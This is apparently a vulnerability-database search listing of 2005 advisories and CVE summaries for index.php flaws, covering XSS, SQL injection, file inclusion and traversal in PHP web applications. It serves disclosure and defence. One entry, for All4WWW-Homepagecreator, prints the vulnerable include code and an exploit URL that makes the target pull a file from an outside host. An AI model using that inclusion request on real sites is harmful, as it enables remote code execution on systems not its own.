7208 matches found
egroupware -- multiple cross-site scripting (XSS) and SQL injection vulnerabilities
Multiple cross-site scripting (XSS) vulnerabilities in eGroupware before 1.0.0.007 allow remote attackers to inject arbitrary web script or HTML via the (1) abid, (2) page, (3) type, or (4) lang parameter to index.php or (5) categoryid parameter. Multiple SQL injection vulnerabilities in index.php in...
AzDGDatingPlatinum.txt
ADZ Security Team =================== Info Program: AzDGDatingPlatinum Version: tested 1.1.0 Modules: view.php, members/index.php Bug type: SQL Injection, XSS Vendor site: http://www.azdg.com/ Vendor Informed: Yes =================== Bug Info SQL Injection: At module view.php I've found a logical...
CVE-2005-1143
EasyPHPCalendar vulnerability CVE-2005-1143: XSS in index.php via the yr parameter, affecting versions prior to 6.2.8. Remote injection of arbitrary web script or HTML is possible as described. Remediation: upgrade to 6.2.8 or later. No exploitation details provided in the connected documents.
All4WWW-Homepagecreator Remote Command Execution
Script: All4WWW-Homepagecreator Version: v1.0a Vendor: http://www.All4WWW.com I. Bug Code On index.php ... if (!$site) $site="home"; include "$site.dat"; ... II. Exploit vuln-host/index.php?site=http://host/some-file PS.: The vendor wasn't informed. by DominusVis Infektion Group...
All4WWW-HomePageCreator 1.0 - 'index.php' Remote File Inclusion
source: https://www.securityfocus.com/bid/13169/info All4WWW-Homepagecreator is affected by an arbitrary remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an 'include' function call. An attacker may...
CVE-2005-1074
CVE-2005-1074 : SQL injection in index.php for RadScripts RadBids Gold 2. An attacker can supply the mode parameter to remotely execute arbitrary SQL commands. Affected: RadScripts RadBids Gold 2; vulnerability arises in the index.php handling of mode. CVSSv2 base score 7.5 (HIGH) with network ac...
CVE-2005-1073
CVE-2005-1073 describes a directory-traversal vulnerability in RadScripts RadBids Gold 2, where an attacker can read arbitrary files via the read parameter in index.php. The NVD entry lists a 5.0/Medium CVSS v2 base score with network exposure and no authentication, indicating remote access is po...
CVE-2005-1079
The CVE-2005-1079 entry describes a SQL injection in zOOm Media Gallery 2.1.2 through the catid parameter in index.php, allowing remote attackers to execute arbitrary SQL commands. Affected software: zOOm Media Gallery 2.1.2 (index.php vulnerability in catid). Root cause: unsafely concatenated us...
CVE-2005-1083
CVE-2005-1083 concerns index.php in aeDating 3.2, where an attacker can remotely include arbitrary files via the skin parameter. This is a plain file inclusion vulnerability and results in arbitrary file inclusion. Context from multiple sources (NVD/Red Hat/CVE records) confirms the affected prod...
CVE-2005-1074
SQL injection vulnerability in index.php for RadScripts RadBids Gold 2 allows remote attackers to execute arbitrary SQL commands via the mode parameter...
CVE-2005-1083
index.php in aeDating 3.2 allows remote attackers to include arbitrary files via the skin parameter...
CVE-2005-1075
Multiple cross-site scripting (XSS) vulnerabilities in RadScripts RadBids Gold 2 allow remote attackers to inject arbitrary web script or HTML via (1) the farea parameter to faq.php or the (2) cat, (3) order, or (4) area parameters to index.php...
CVE-2005-1143
Cross-site scripting (XSS) vulnerability in index.php in EasyPHPCalendar before 6.2.8 allows remote attackers to inject arbitrary web script or HTML via the yr parameter...
CubeCart <= 2.0.6 Multiple SQL Injections
The installed version of CubeCart on the remote host suffers from multiple SQL injection vulnerabilities due to its failure to sanitize user input via the 'PHPSESSID' parameter of the 'index.php' script, the 'product' parameter of the 'tellafriend.php' script, the 'add' parameter of the...
CVE-2005-0992
Cross-site scripting (XSS) vulnerability in index.php in phpMyAdmin before 2.6.2-rc1 allows remote attackers to inject arbitrary web script or HTML via the convcharset parameter...
CubeCart 2.0.x - 'index.php' Multiple Full Path Disclosures
source: https://www.securityfocus.com/bid/13050/info CubeCart is reported prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. These issues affect the 'index.php',...
phpMyAdmin index.php convcharset Parameter XSS
The installed version of phpMyAdmin suffers from a cross-site scripting vulnerability due to its failure to sanitize user input to the 'convcharset' parameter of the 'index.php' script. A remote attacker may use these vulnerabilities to cause arbitrary code to be executed in a user's browser to...
CVE-2005-0879
CVE-2005-0879 affects Vortex Portal Content Management System. It is a PHP remote file inclusion flaw in content.php and index.php that lets an attacker execute arbitrary PHP code by passing a URL in the act parameter. Documented impact per NVD: partial confidentiality, integrity, and availabilit...
CVE-2005-0870
Multiple cross-site scripting (XSS) vulnerabilities in phpSysInfo 2.3, when register_globals is enabled, allow remote attackers to inject arbitrary web script or HTML via the (1) sensorprogram parameter to index.php, (2) textlanguage, (3) texttemplate, or (4) hidepicklist parameter to systemfooter.php...
CVE-2005-0889
CVE-2005-0889 describes a cross-site scripting (XSS) vulnerability in Dream4 Koobi CMS 4.2.3, specifically in index.php where the area parameter can be abused to inject arbitrary script/HTML. The vulnerability is documented with a CVSS v2 base score of 4.3 (Medium) and indicates that the attack v...